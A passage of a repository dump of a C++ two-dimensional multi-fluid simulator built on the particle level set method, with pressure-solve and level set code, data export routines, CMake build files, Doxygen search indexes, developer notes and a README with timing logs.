the PCG method */\n Eigen::ConjugateGradient<Eigen::SparseMatrix<double>> solver;\n Eigen::VectorXd pressures(nf);\n solver.compute(A);\n // pressures = solver.solveWithGuess(rhs, old_pressures);\n pressures = solver.solve(rhs);\n\n /* Copy the new pressure values over */\n p.clear();\n for (int i = 0; i < p.size(); i++) {\n if (fluid_cell_count(i) < 0)\n continue;\n p(i) = pressures(fluid_cell_count(i));\n }\n}\n\n/** Applies the discrete pressure gradient using a similar method as how the\n * coefficient matrix in solve_pressure is constructed. */\nvoid Simulation::apply_pressure_gradient(float dt) {\n for (auto it = u.begin(); it != u.end(); it++) {\n vec2 ij = it.ij();\n if (ij.x < 1 || ij.x >= u.sx - 1)\n continue;\n if (solid_phi(ij) <= 0 || solid_phi(ij - vec2(1, 0)) <= 0)\n continue;\n float du = sample_density(ij, ij - vec2(1, 0)) * (dt / h) *\n (p(ij) - p(ij - vec2(1, 0)));\n u(ij) -= du;\n }\n\n for (auto it = v.begin(); it != v.end(); it++) {\n vec2 ij = it.ij();\n if (ij.y < 1 || ij.y >= v.sy - 1)\n continue;\n if (solid_phi(ij) <= 0 || solid_phi(ij - vec2(0, 1)) <= 0)\n continue;\n float dv = sample_density(ij, ij - vec2(0, 1)) * (dt / h) *\n (p(ij) - p(ij - vec2(0, 1)));\n v(ij) -= dv;\n }\n}\n"
},
{
"alpha_fraction": 0.6460176706314087,
"alphanum_fraction": 0.6548672318458557,
"avg_line_length": 11.666666984558105,
"blob_id": "b5958c1a2b4daa80c273707e3be155bae21b7765",
"content_id": "28c048ea4d2a68551e4d82763eff5ab1414f81cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 113,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 9,
"path": "/src/main.cpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#include \"settings.hpp\"\n\nint main() {\n Simulation sim;\n initialize_simulation(sim);\n\n sim.run();\n return 0;\n}"
},
{
"alpha_fraction": 0.5427110195159912,
"alphanum_fraction": 0.561892569065094,
"avg_line_length": 35.21296310424805,
"blob_id": "537ae1612ee4037981c04447c3c1578a65657eac",
"content_id": "b1cdf07bbbce3ce73a3d08d1bb528e0b0b9bda02",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3910,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 108,
"path": "/lib/particle_levelset_method.hpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#pragma once\n#include \"calculus.hpp\"\n#include \"simulation.hpp\"\n#include <glm/gtc/random.hpp>\nusing namespace glm;\n\n// TODO remove solid phi\nvoid reseed_particles(Fluid &f, Array2f solid_phi) {\n /* start by removing invalid particles */\n for (auto &p : f.particles) {\n float local_phi = f.phi.value_at(p.position);\n p.valid = (abs(local_phi) < 3.f * f.phi.h);\n }\n f.particles.erase(std::remove_if(f.particles.begin(), f.particles.end(),\n [](Particle const &p) { return !p.valid; }),\n f.particles.end());\n\n /* count particles in voxels */\n f.particle_count.clear();\n for (auto &p : f.particles) {\n vec2 grid_coordinates = f.particle_count.coordinates_at(p.position);\n f.particle_count(grid_coordinates) += 1;\n }\n\n /* seed new particles to non-full voxels */\n for (int i = 0; i < f.phi.size(); i++) {\n // FIXME\n vec2 ij = f.phi.ij_from_index(i);\n if (abs(f.phi(i)) > 3.f * f.phi.h || ij.x < 2 || ij.y < 2 ||\n ij.x > f.phi.sx - 3 || ij.y > f.phi.sy - 3 || solid_phi(i) <= 0)\n continue;\n while (f.particle_count(i) < 16) {\n vec2 position = f.particle_count.wp_from_index(i) +\n linearRand(vec2(0), vec2(f.phi.h));\n float initial_phi = f.phi.value_at(position);\n float goal_phi =\n (initial_phi > 0)\n ? clamp(initial_phi, 0.1f * f.phi.h, 1.0f * f.phi.h)\n : clamp(initial_phi, -1.0f * f.phi.h, -0.1f * f.phi.h);\n vec2 normal = normalize(interpolate_gradient(f.phi, position));\n vec2 new_position = position + (goal_phi - initial_phi) * normal;\n new_position =\n clamp(new_position, 2.001f * f.phi.h,\n (max((float)f.phi.sx, (float)f.phi.sy) - 2.001f) * f.phi.h);\n float new_phi = f.phi.value_at(new_position);\n float radius = clamp(abs(new_phi), 0.1f * f.phi.h, 0.5f * f.phi.h);\n f.particles.push_back(Particle(new_position, new_phi, radius));\n f.particle_count(i) += 1;\n }\n }\n}\n\nvoid adjust_particle_radii(Fluid &f) {\n for (auto &p : f.particles) {\n float local_phi = f.phi.value_at(p.position);\n p.radius = clamp(abs(local_phi), 0.1f * f.phi.h, 0.5f * f.phi.h);\n }\n}\n\n/** Correct a levelset using the particle level set method */\nvoid correct_levelset(Fluid &f) {\n /* Compute phi+ and phi- */\n Array2f phi_minus(f.phi);\n Array2f phi_plus(f.phi);\n for (auto &p : f.particles) {\n float local_phi = f.phi.value_at(p.position);\n if (p.starting_phi * local_phi >= 0 || abs(local_phi) < p.radius)\n continue;\n float sign_p = (p.starting_phi > 0) ? 1.f : -1.f;\n vec2 grid_position = vec2(ivec2(f.phi.coordinates_at(p.position)));\n for (auto offset : {vec2(0, 0), vec2(1, 0), vec2(0, 1), vec2(1, 1)}) {\n float phi_p =\n sign_p *\n (p.radius -\n distance(p.position, f.phi.worldspace_of(grid_position + offset)));\n if (sign_p > 0) {\n phi_plus(grid_position + offset) =\n max(phi_p, phi_plus(grid_position + offset));\n } else {\n phi_minus(grid_position + offset) =\n min(phi_p, phi_minus(grid_position + offset));\n }\n }\n }\n /* Merge phi+ and phi- */\n for (int i = 0; i < f.phi.size(); i++) {\n if (abs(phi_plus(i)) >= abs(phi_minus(i))) {\n f.phi(i) = phi_minus(i);\n } else {\n f.phi(i) = phi_plus(i);\n }\n }\n}\n\nvoid advect_particles(Fluid &f, VelocityField &vel, Array2f &solid_phi,\n float dt) {\n for (auto &p : f.particles) {\n p.position = rk4(p.position, vel, dt);\n if (solid_phi.value_at(p.position) < 0.0) {\n p.position -= solid_phi.value_at(p.position) *\n interpolate_gradient(solid_phi, p.position);\n }\n p.position.x =\n clamp(p.position.x, solid_phi.h, (solid_phi.sx - 1.f) * solid_phi.h);\n p.position.y =\n clamp(p.position.y, solid_phi.h, (solid_phi.sy - 1.f) * solid_phi.h);\n }\n}"
},
{
"alpha_fraction": 0.5454545617103577,
"alphanum_fraction": 0.738095223903656,
"avg_line_length": 65,
"blob_id": "c8a84c1fe44e15cc64a6e923b549db5bed630f28",
"content_id": "bae4f06592828830c8ceb39d045ba78b454d9ed1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 462,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 7,
"path": "/docs/search/functions_6.js",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['sample_5fdensity',['sample_density',['../classSimulation.html#aa8c0d91b0d040b6663d4a452688e931c',1,'Simulation']]],\n ['set',['set',['../structArray2.html#ad264d90ac5d4de34e9bbc214810e169a',1,'Array2']]],\n ['snapped_5faccess',['snapped_access',['../structArray2.html#a325c7d62e750ae57f8aed0500b4fbfa1',1,'Array2']]],\n ['solve_5fpressure',['solve_pressure',['../classSimulation.html#a12f7b360ce5d22c5e8a8d111acd1c884',1,'Simulation']]]\n];\n"
},
{
"alpha_fraction": 0.686843752861023,
"alphanum_fraction": 0.6998146772384644,
"avg_line_length": 35,
"blob_id": "fad5a75724193ed3be509868e5f30673a48e9493",
"content_id": "b0f91bc43cb667059f8a7a29c37235ac32864d5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1621,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 45,
"path": "/lib/notes.txt",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "todo initialize walls\n\n--- BUGS\nij.x is NaN in snapped access???\n\n--- data design\nFILE STRUCTURE\n data is stored in the plot/data/ directory\n one instance of a simulation produces the following datafiles:\n - phi.dat, which includes phi values and fluid types\n - velocity.dat, which includes an interpolated velocity at voxel centers\n - particles.dat, which includes marker particles used in the particle level set method\nDATA STRUCTURE\n - phi.dat\n #x y id phi\n 0.05 0.05 0 -0.23\n ... ... ... ...\n\n\n\npoint in space -> grid coordinates for different types\n^ drafted out on paper\n\nor potentially universal grid that index\n\n~~~ A Boundary Condition Capturing Method for Poisson's Equation on Irregular Domains\nsome facts:\n - the whole computation domain is solved in one step:\n \"For eah grid point i, one can write a linear equation of the form...\n and assemble the system of linear equations into matrix form. Each\n Bk+1/2 is evaluated based on the side of the interfae that xk and xk+1 lie on. If xk\n and xk+1 lie on opposite sides of the interfae, then \fBk+1/2 is defi\fned along\n the lines of equation 48 and equation 33.\"\n\n - the coefficient matrix is unchanged\n \"Furthermore,\n the oeÆient matrix of the assoiated linear system is the standard symmetri matrix for the variable oeÆient Poisson equation in the absene of\n interfaes allowing for straightforward appliation of standard \\blak box\"\n solvers.\"\n\nQUESTION:\n does it require only 1 grid for velocity, pressure, etc?\n pretty sure (?)"
},
{
"alpha_fraction": 0.5697503685951233,
"alphanum_fraction": 0.7518355250358582,
"avg_line_length": 96.28571319580078,
"blob_id": "5c079445d469ff3df66cb54dd0a868d2e5df5540",
"content_id": "1390fb7c64eef42264a409eb8201fa2c50970adc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 681,
"license_type": "no_license",
"max_line_length": 244,
"num_lines": 7,
"path": "/docs/search/functions_0.js",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['add_5ffluid',['add_fluid',['../classSimulation.html#a1aa01e35508d7a15739eb16e15ab5e00',1,'Simulation']]],\n ['apply_5fpressure_5fgradient',['apply_pressure_gradient',['../classSimulation.html#a2393e1da56190503c9e8320b8a94368c',1,'Simulation']]],\n ['array2',['Array2',['../structArray2.html#a42645581bcf87a47ecf3263388809112',1,'Array2::Array2()'],['../structArray2.html#ab4f4080a8318cfa7c953ae1ffb560daa',1,'Array2::Array2(int sx_, int sy_, float offset_x_, float offset_y_, float h_)']]],\n ['assemble_5fpoisson_5fcoefficient_5fmatrix',['assemble_poisson_coefficient_matrix',['../classSimulation.html#aad703d643ef271ce842f2b27e7a1b5fc',1,'Simulation']]]\n];\n"
},
{
"alpha_fraction": 0.6394557952880859,
"alphanum_fraction": 0.6734693646430969,
"avg_line_length": 20.14285659790039,
"blob_id": "410d551801ffc5e48529e5b527f46f841089e109",
"content_id": "8418b912b95ad42267846b1bad2fa532f1da2c80",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 147,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 7,
"path": "/test/test_calculus.cpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#include \"gtest/gtest.h\"\n\n#include \"calculus.hpp\"\n\nTEST(FirstParam, rk4) { EXPECT_EQ(1, 1); }\n\nTEST(FirstParam, forward_euler) { EXPECT_EQ(1, 1); }"
},
{
"alpha_fraction": 0.5877862572669983,
"alphanum_fraction": 0.7251908183097839,
"avg_line_length": 31.75,
"blob_id": "d4b00abc597fbef37245220706bcc4f82f0b80a1",
"content_id": "8683a3f58d9966ec2fcbfe60cf88700aecf65888",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 131,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 4,
"path": "/docs/search/all_a.js",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['worldspace_5fof',['worldspace_of',['../structArray2.html#afded5f53e6245dc3dbbc4e371eca7bc7',1,'Array2']]]\n];\n"
},
{
"alpha_fraction": 0.5833333134651184,
"alphanum_fraction": 0.6354166865348816,
"avg_line_length": 23,
"blob_id": "87ef63e858d6e968625ce994e3692f9490c60d0f",
"content_id": "5e9415a55f9af74369ced9d83f88d4de46aa4cd5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 96,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 4,
"path": "/docs/search/classes_2.js",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['iterator',['iterator',['../classArray2_1_1iterator.html',1,'Array2']]]\n];\n"
},
{
"alpha_fraction": 0.5668125152587891,
"alphanum_fraction": 0.5715247392654419,
"avg_line_length": 33.160919189453125,
"blob_id": "c311269efee24da6801837726675694624803ee8",
"content_id": "9d2850320eb1f8bf386bb469c0fe38d7b0c288ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2971,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 87,
"path": "/lib/export_data.hpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#include \"fluid.hpp\"\n#include \"simulation.hpp\"\n#include <fstream>\n#include <iostream>\n#include <vector>\n\nvoid export_particles(std::vector<Fluid> &sim, float time, int frame_number) {\n std::fstream part_file(\"plot/data/part.txt\", part_file.out | part_file.app);\n part_file << \"#BLOCK HEADER time:\" << time << \"\\n\";\n part_file << \"#x\\ty\\tinitial_phi\\tradius\\n\";\n part_file << \"\\n\";\n\n for (auto &f : sim) {\n for (auto &p : f.particles) {\n part_file << p.position.x << \"\\t\" << p.position.y << \"\\t\"\n << p.starting_phi << \"\\t\" << p.radius << \"\\n\";\n }\n }\n part_file.close();\n}\n\n/* exports velocities sampled at the voxel centers */\nvoid export_velocity(VelocityField &vel, Array2f phi, float time,\n int frame_number) {\n std::fstream vel_file(\"plot/data/vel.txt\", vel_file.out | vel_file.app);\n\n vel_file << \"#BLOCK HEADER time:\" << time << \"\\n\";\n vel_file << \"#x\\ty\\tu\\tv\\n\";\n vel_file << \"\\n\";\n\n for (auto it = phi.begin(); it != phi.end(); it++) {\n vec2 wp = it.wp();\n vec2 velocity = vel(wp);\n vel_file << wp.x << \"\\t\" << wp.y << \"\\t\" << velocity.x << \"\\t\" << velocity.y\n << \"\\n\";\n }\n}\n\n/** we make use of the fact that by our projection method, only one fluid at any\n * point has a negative phi value. so if we only include negative phi values, we\n * are guaranteed both no overlaps (because at most 1 is negative) and no gaps\n * (because we will never have no gaps).\n * */\nvoid export_fluid_ids(Array2f &p, std::vector<Fluid> &fluids, float time,\n int frame_number) {\n std::fstream fluid_id_file(\"plot/data/phi.txt\",\n fluid_id_file.out | fluid_id_file.app);\n\n fluid_id_file << \"#BLOCK HEADER time:\" << time << \"\\n\";\n fluid_id_file << \"#x\\ty\\tphi\\tid\\tpressure\\n\";\n fluid_id_file << \"\\n\";\n\n for (int n = 0; n < (int)fluids.size(); n++) {\n auto &f = fluids[n];\n for (auto it = f.phi.begin(); it != f.phi.end(); it++) {\n if (*it > 0)\n continue;\n vec2 ij = it.ij();\n vec2 wp = f.phi.worldspace_of(ij);\n fluid_id_file << wp.x << \"\\t\" << wp.y << \"\\t\" << *it << \"\\t\" << n << \"\\t\"\n << p(ij) << \"\\n\";\n }\n }\n fluid_id_file.close();\n}\n\nvoid export_simulation_data(Array2f &p, VelocityField vel,\n std::vector<Fluid> &sim, float time,\n int frame_number) {\n std::printf(\"exporting frame %i at time %.2f\\n\", frame_number, time);\n export_fluid_ids(p, sim, time, frame_number);\n export_velocity(vel, sim[0].phi, time, frame_number);\n // export_particles(sim, time, frame_number);\n // TODO either remove this or make it take less storage (literally 91gb)\n}\n\nvoid clear_exported_data() {\n std::ofstream phi_file;\n phi_file.open(\"plot/data/phi.txt\");\n phi_file << \"# BEGIN PHI DATASET\\n\";\n phi_file.close();\n\n std::ofstream vel_file;\n phi_file.open(\"plot/data/vel.txt\");\n phi_file << \"# BEGIN VELOCITY DATASET\\n\";\n phi_file.close();\n}"
},
{
"alpha_fraction": 0.6866952776908875,
"alphanum_fraction": 0.7038626670837402,
"avg_line_length": 30.066667556762695,
"blob_id": "b633f4dcc867504856aa412da0395ba51232a184",
"content_id": "2d608cde9feff42417af42ab221074753d836c71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 466,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 15,
"path": "/lib/CMakeLists.txt",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "include_directories(${CMAKE_CURRENT_LIST_DIR})\ninclude_directories(${PROJECT_ROOT}/thirdparty/nlohmann_json)\n\nset(lib_src ${CMAKE_CURRENT_LIST_DIR})\naux_source_directory(${CMAKE_CURRENT_LIST_DIR} lib_src)\nadd_library(${PROJECT_NAME}lib STATIC ${lib_src})\n\nfind_package(GLM 0.9.5 REQUIRED)\ninclude_directories(SYSTEM ${GLM_INCLUDE_DIRS})\n\nfind_package(Eigen3\n 3.3.0\n REQUIRED\n NO_MODULE)\ninclude_directories(${EIGEN3_INCLUDE_DIR})\n"
},
{
"alpha_fraction": 0.5344827771186829,
"alphanum_fraction": 0.7068965435028076,
"avg_line_length": 28,
"blob_id": "6dd34c5203d1b92f10d7566887d8c01225bef3eb",
"content_id": "8159cb41bea670d4895211608b5b2a84f4432fa6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 116,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 4,
"path": "/docs/search/functions_5.js",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['run',['run',['../classSimulation.html#ae5c367f87c0b5dc9740bc6d00e44e72c',1,'Simulation']]]\n];\n"
},
{
"alpha_fraction": 0.6466542482376099,
"alphanum_fraction": 0.714684009552002,
"avg_line_length": 36.36805725097656,
"blob_id": "36c56cf5244b2a45728bdd074c4f2928bb0444a4",
"content_id": "c1c7a457ed10d4f90b4bbf9e85f0b6ca234d6978",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5380,
"license_type": "no_license",
"max_line_length": 353,
"num_lines": 144,
"path": "/README.md",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "[](https://travis-ci.com/bpatmiller/gfm2d)\n[](https://codecov.io/gh/bpatmiller/gfm2d)\n\n### about\nPlease read [this paper describing the project](writeup.pdf). The majority of the information comes from the original Particle Level Set Method paper, Level Set Methods and Dynamic Implicit Surfaces by Fedkiw and Osher, Multiple Interacting Fluids by Losasso et al, Stable Fluids by Stam et al, and various university pdfs scattered across the internet.\n\nThe name of this program comes from the Ghost Fluid Method, which is not used in this program.\n\n### BIG TODOS:\n* [ ] optimization - measure timings for different simulation components\n* [ ] do some documentation (? maybe idk if anyone will read the code)\n* [ ] fix cmake like a real human\n* [ ] move draw.py and movie.py to src/, also substantially refactor and consolidate (common.py) both of them.\n* [ ] cleaner, more portable format - config and data. consider the config file determining filename\n* [ ] more examples (!) (like stored in file)\n* [ ] do more test / fix catch2\n\n...\n\n* [x] get coverage working\n* [x] set up auto code review\n* [x] get travis build working\n* [x] get catch2 working\n* [x] set up array2\n* [x] make skeleton data structures\n* [x] level set initialization\n* [x] fix weird cyclic dependency\n* [x] do some simple graphics\n* [x] do level set work\n* [x] phi projection method\n* [x] levelset reinitialization\n* [x] density sampling\n* [x] poisson coefficient matrix\n* [x] poisson rhs\n* [x] pressure projection!!!\n* [x] make levelset initialization better\n* [x] impliment reactions (or something else cool)\n\n\n### data format for graphing\nwithin the plot/ folder, there are seperate files for:\n- pressure\n- velocities\n- phi/fluid id pairs\n- (maybe) particles for each fluid\n \nthe format for pressure is:\n\nx position, y position, pressure\n\nthe format for velocities are:\n\nx position, y position, x velocity, y velocity\n\nthe format for phi/fluid id pairs is:\n\nx position, y position, phi, fluid id\n\n>Note: these phi values will always be negative\n\nThe locus of each fluid will be drawn with solid cells, where the hue will be chosen according to which fluid exists at the center of the cell, and the intensity will be chosen based on the value of phi.\nVelocity will be drawn on top of the cell centers as an arrow pointing along its interpolated velocity.\n\n### config.json\n\nto add fluids, we use the \"fluid\" entry type in the json. A fluid entry consists of a name,\na density, and a phi definition. As of now, the only supported phi computation is of a circle\n(exterior and interior).\n\n### Dependencies\nnlohmann/json\ncatch2\nEigen3\nGLM\n\n### me learning that O3 is very good\ndebug:\n\n[ 0.852 seconds have passed ] exporting frame 0 at time 0.000000\n[ 1.420 seconds have passed ] exporting frame 1 at time 0.250000\n[ 9.732 seconds have passed ] exporting frame 2 at time 0.500000\n[ 25.893 seconds have passed ] exporting frame 3 at time 0.750000\n[ 48.799 seconds have passed ] exporting frame 4 at time 1.000000\n=======================================================================\n\nrelease:\n\n[ 0.033 seconds have passed ] exporting frame 0 at time 0.000000\n[ 0.085 seconds have passed ] exporting frame 1 at time 0.250000\n[ 0.377 seconds have passed ] exporting frame 2 at time 0.500000\n[ 0.936 seconds have passed ] exporting frame 3 at time 0.750000\n[ 1.690 seconds have passed ] exporting frame 4 at time 1.000000\n===============================================================================\n\n# performance benefits of solving with an initial guess\nwith guess:\n\n[ 0.00s elapsed ] exporting frame 0 at time 0.00\n[ 0.02s elapsed ] exporting frame 1 at time 1.00\n[ 19.56s elapsed ] exporting frame 2 at time 2.00\n[ 44.51s elapsed ] exporting frame 3 at time 3.00\n[ 78.75s elapsed ] exporting frame 4 at time 4.00\n\nwithout guess:\n\nTODO finish this\n\n\nTESTING LEVELSET REINITIALIZATION\nconfig1:\n- steps = 50, tol = 1e-1f, dt = 0.5f * h\n\n[ 0.03s elapsed ] exporting frame 0 at time 0.00\n[ 0.12s elapsed ] exporting frame 1 at time 0.50\n[ 1.33s elapsed ] exporting frame 2 at time 1.00\n[ 3.82s elapsed ] exporting frame 3 at time 1.50\n[ 8.42s elapsed ] exporting frame 4 at time 2.00\n\n[ 0.03s elapsed ] exporting frame 0 at time 0.00\n[ 0.12s elapsed ] exporting frame 1 at time 0.50\n[ 1.37s elapsed ] exporting frame 2 at time 1.00\n[ 3.91s elapsed ] exporting frame 3 at time 1.50\n[ 8.73s elapsed ] exporting frame 4 at time 2.00\n\n[ 0.03s elapsed ] exporting frame 0 at time 0.00\n[ 0.12s elapsed ] exporting frame 1 at time 0.50\n[ 1.33s elapsed ] exporting frame 2 at time 1.00\n[ 3.77s elapsed ] exporting frame 3 at time 1.50\n[ 8.43s elapsed ] exporting frame 4 at time 2.00\n\n- steps = 250, tol = 1e-1f, dt = 0.5f * h\n[ 8.53s elapsed ] exporting frame 4 at time 2.00\n\n[ 0.02s elapsed ] exporting frame 0 at time 0.00\n[ 0.11s elapsed ] exporting frame 1 at time 0.50\n[ 1.34s elapsed ] exporting frame 2 at time 1.00\n[ 3.74s elapsed ] exporting frame 3 at time 1.50\n[ 8.27s elapsed ] exporting frame 4 at time 2.00\n\n[ 0.03s elapsed ] exporting frame 0 at time 0.00\n[ 0.12s elapsed ] exporting frame 1 at time 0.50\n[ 1.37s elapsed ] exporting frame 2 at time 1.00\n[ 3.93s elapsed ] exporting frame 3 at time 1.50\n[ 8.50s elapsed ] exporting frame 4 at time 2.00"
},
{
"alpha_fraction": 0.5467705726623535,
"alphanum_fraction": 0.7104676961898804,
"avg_line_length": 98.77777862548828,
"blob_id": "cb8ca782f7bea6939c7404fbb24ad5b31125ce86",
"content_id": "df2dfc00ecf2deabd51a57f6beb7c1f0c9c1241e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 898,
"license_type": "no_license",
"max_line_length": 291,
"num_lines": 9,
"path": "/docs/search/all_0.js",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['add_5ffluid',['add_fluid',['../classSimulation.html#a1aa01e35508d7a15739eb16e15ab5e00',1,'Simulation']]],\n ['apply_5fpressure_5fgradient',['apply_pressure_gradient',['../classSimulation.html#a2393e1da56190503c9e8320b8a94368c',1,'Simulation']]],\n ['array2',['Array2',['../structArray2.html',1,'Array2< T >'],['../structArray2.html#a42645581bcf87a47ecf3263388809112',1,'Array2::Array2()'],['../structArray2.html#ab4f4080a8318cfa7c953ae1ffb560daa',1,'Array2::Array2(int sx_, int sy_, float offset_x_, float offset_y_, float h_)']]],\n ['array2_3c_20float_20_3e',['Array2< float >',['../structArray2.html',1,'']]],\n ['array2_3c_20int_20_3e',['Array2< int >',['../structArray2.html',1,'']]],\n ['assemble_5fpoisson_5fcoefficient_5fmatrix',['assemble_poisson_coefficient_matrix',['../classSimulation.html#aad703d643ef271ce842f2b27e7a1b5fc',1,'Simulation']]]\n];\n"
},
{
"alpha_fraction": 0.7368420958518982,
"alphanum_fraction": 0.7428817749023438,
"avg_line_length": 27.975000381469727,
"blob_id": "c9de9bfd401712f21f0184257db4679f59f519c8",
"content_id": "06f3ddd8c84a4baddc363726e285203ed27eb779",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 1159,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 40,
"path": "/CMakeLists.txt",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 3.12)\n\nset(PROJECT_NAME \"gfm\")\nset(PROJECT_ROOT ${CMAKE_CURRENT_LIST_DIR})\n\nproject(${PROJECT_NAME})\nset(CMAKE_RUNTIME_OUTPUT_DIRECTORY ${CMAKE_BINARY_DIR}/bin)\n\nset(CMAKE_CXX_STANDARD 20)\nset(CMAKE_CXX_STANDARD_REQUIRED ON)\nset(CMAKE_CXX_EXTENSIONS OFF)\n\nset(CMAKE_CXX_FLAGS \"-Wall -Wextra -Werror -Wno-unused-parameter\")\nset(CMAKE_CXX_FLAGS_DEBUG \"-g -O0\")\nset(CMAKE_CXX_FLAGS_RELEASE \"-O3\")\n\n# TODO consider changing coverage methodology?\nset(CMAKE_CXX_FLAGS_COVERAGE \"${CMAKE_CXX_FLAGS_DEBUG} --coverage\")\nset(CMAKE_EXE_LINKER_FLAGS_COVERAGE\n \"${CMAKE_EXE_LINKER_FLAGS_DEBUG} --coverage\")\nset(CMAKE_SHARED_LINKER_FLAGS_COVERAGE\n \"${CMAKE_SHARED_LINKER_FLAGS_DEBUG} --coverage\")\n\nif(DEFINED ENV{COVERAGE_OPTION})\n set(CMAKE_BUILD_TYPE COVERAGE)\n message(STATUS \"OPT building with coverage options !!\")\nelse()\n set(CMAKE_BUILD_TYPE RELEASE)\n message(STATUS \"OPT building without coverage options ~~\")\nendif()\n#\n\nset(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} \"${PROJECT_ROOT}/cmake/\")\n\nadd_subdirectory(lib)\nif(DEFINED ENV{TEST_OPTION})\n message(\"Building GTest\")\n add_subdirectory(test)\nendif()\nadd_subdirectory(src)\n"
},
{
"alpha_fraction": 0.6088844537734985,
"alphanum_fraction": 0.6255844831466675,
"avg_line_length": 29.87628936767578,
"blob_id": "caa0cf4836b883b1496bf61f579231659525e554",
"content_id": "dc9ba5c533272113bf648fd9fc62939618b301f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2994,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 97,
"path": "/lib/simulation.hpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#pragma once\n#include \"fluid.hpp\"\n#include \"velocityfield.hpp\"\n#include <chrono>\n#include <eigen3/Eigen/SparseCore>\n#include <stdio.h>\n#include <vector>\n\n/** \\class Simulation\n * The main simulation class that defines our computational domain. It\n * is described spatially by a cell size (h) and a number of cells in both\n * dimensions (sx, sy).\n *\n * stores velocity and pressure,\n * a list of fluids contained in it,\n * a solid phi describing boundary locations\n * a map from voxels to fluid type\n */\nclass Simulation {\npublic:\n int sx = 0; // number of voxels on the x-axis\n int sy = 0; // number of voxels on the y-axis\n float h = 0; // voxel size\n\n float time_elapsed = 0; // amount of time elapsed\n float max_t = 0; // full simulation runtime\n float timestep = 0; // timestep per frame\n int frame_number = 0; // current frame\n int reseed_counter = 0; // used for PLS\n\n vec4 rxn; // 0 -> reactant1, 1->reactant2, 2->product, 3->rate\n\n Array2f u; // horizontal velocity, sampled at cell sides\n Array2f v; // vertical velocity, sampled at cell tops/bottoms\n Array2f p; // pressure, sampled at center\n VelocityField vel;\n\n std::vector<Fluid> fluids;\n Array2f solid_phi; // phi corresponding to solid boundaries, not important as\n // a SDF just to identify solids. Sampled at cell centers\n Array2i fluid_id; // describes which fluid occupies a given voxel, sampled at\n // cell centers.\n\n Simulation() {}\n Simulation(int sx_, int sy_, float h_) : sx(sx_), sy(sy_), h(h_) {}\n\n void init() {\n assert(sx != 0 && sy != 0 && h != 0);\n // face-located quantities\n u.init(sx + 1, sy, 0.0, -0.5, h);\n v.init(sx, sy + 1, -0.5, 0.0, h);\n // center-located quantities\n p.init(sx, sy, -0.5, -0.5, h);\n solid_phi.init(sx, sy, -0.5, -0.5, h);\n fluid_id.init(sx, sy, -0.5, -0.5, h);\n vel.up = &u;\n vel.vp = &v;\n }\n\n void init(int sx_, int sy_, float h_, float max_t_, float dt_) {\n sx = sx_;\n sy = sy_;\n h = h_;\n max_t = max_t_;\n timestep = dt_;\n init();\n }\n\n /** Creates a fluid of a given density, but does not equip it with a phi*/\n void add_fluid(float density) { fluids.push_back(Fluid(density, sx, sy, h)); }\n\n void print_information() {\n printf(\"~~ Simulation information ~~\\n sx: %i, sy: %i, h: %f\\n no. \"\n \"fluids: %i\\n\",\n sx, sy, h, static_cast<int>(fluids.size()));\n for (auto f : fluids) {\n f.print_information();\n }\n }\n\n void run();\n void advance(float dt);\n\n /* SIMULATION METHODS */\n float cfl();\n void 